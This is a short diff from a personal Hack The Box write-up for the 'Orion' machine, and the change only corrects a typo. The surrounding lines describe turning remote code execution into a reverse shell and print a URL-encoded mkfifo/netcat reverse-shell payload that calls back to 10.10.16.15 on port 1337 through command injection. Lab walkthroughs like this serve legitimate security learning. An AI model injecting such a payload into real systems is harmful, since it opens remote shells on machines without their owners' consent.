vmakaa/vmakaa.github.io/pwn-counter/HTB Boxes/Orion.md

 ---

-Now taht we know we have RCE, lets go ahead and get a reverse shell onto the system by cmd injecting a nc reverse shell into the URL.
+Now that we know we have RCE, lets go ahead and get a reverse shell onto the system by cmd injecting a nc reverse shell into the URL.

 I URL encoded an nc mkfifo commadn including all special chars which gave me ```rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20%2Di%202%3E%261%7Cnc%2010%2E10%2E16%2E15%201337%20%3E%2Ftmp%2Ff```.